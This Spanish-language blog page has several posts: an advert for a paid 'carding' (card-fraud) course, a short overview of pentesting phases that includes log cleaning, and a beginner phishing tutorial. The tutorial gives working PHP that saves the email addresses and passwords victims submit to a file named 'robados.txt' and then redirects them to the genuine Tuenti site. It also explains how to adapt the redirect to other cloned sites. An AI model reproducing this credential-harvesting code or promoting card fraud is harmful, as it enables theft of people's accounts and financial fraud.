Stand by
Bueno mis lectores como ando en vacaciones no he podio hacer publicaciones pero les quiero avisar que voy a iniciar un curso de carding para los que se quieran inscribir lo voy a iniciar en febrero si alguien se quiere inscribir me puede escribir al correo thefidentis@yahoo.es
O publican un comentario en esta entrada.
Pentester y Pentesting
Averiguando un poco sobre lo que me interesa encontre esta info muy valiosa, espero les sea de ayuda como lo fue para mi:
Que es un Pentester? |
Un Pentester es un experto en seguridad de sistemas con el instinto y conocimientos de un Hacker, qué utiliza sus amplios conocimientos en el manejo de sistemas operativos, aplicaciones y vulnerabilidades, con conocimientos en programación para la creación de herramientas y códigos, procesamientos sistemáticos de pruebas, creación de documentaciones, escritura de reportes y presentar resultados de sus investigaciones a técnicos y áreas de administración.
En que consiste un Pentesting |
Preparación Objetivo del pentest, clasificación del test (interno/externo, black-/white-box, agresividad, objetivos), contactos, accesos a la infraestructura y herramientas, duración del test, legalidades (contratos, privacia,etc), área de trabajo |
Proceso 1 Foot printing (DNS, Who is, ISP) 2 Port scanning (TCP and UDP) 3 Finger printing (Operating System, ICMP, Services, Applications) 4 Vulnerability Research (Internet, CVE) 5 Exploiting (Exploits, Trophy) 6 Hide Traces (Log cleaning) 7 Documentation (Report, Presentation) |
Reporte Pagina principal, introducción (2 paginas: objetivos, metodos y herramientas), resultados, agregados, recomendaciones, anexos con datos de test técnicos, retroalimentación FUENTE |
HTTP al descubierto
Resulta que andaba programando un virus en c++ y me tope con esto que se llama HTTP al descubierto
al final del documento esta la fuente.
Como hacer un scam
Weno aky os dejo a los q empezais en el hack o en el phising, un tutorial muy bueno para acer vuestros propios scams, recordar q algunas web
tienen proteccion contra phising y no os saldra bien el scam.
Codigo php para q no tengais q copiarlo desde el tutorial:
$id=$_POST[‘entrar’];
$pass=$_POST[‘cont’];
$master=fopen(‘robados.txt’,a);
fwrite($master,»
email: «.$id.» …… pass: » .$pass.» «);
fclose($master);
echo «<meta http-equiv=’Refresh’ content=’1;url=http://www.tuenti.com/’>»;
?>
Esta ultima linea: echo «<meta http-equiv=’Refresh’ content=’1;url=http://www.tuenti.com/’>»;
es para q cuando entre se recargue a la pagina original asi q donde pone http://www.tuenti.com, poned la pagina q aveis echo el scam
Herramientas usadas en el Video-Tutorial: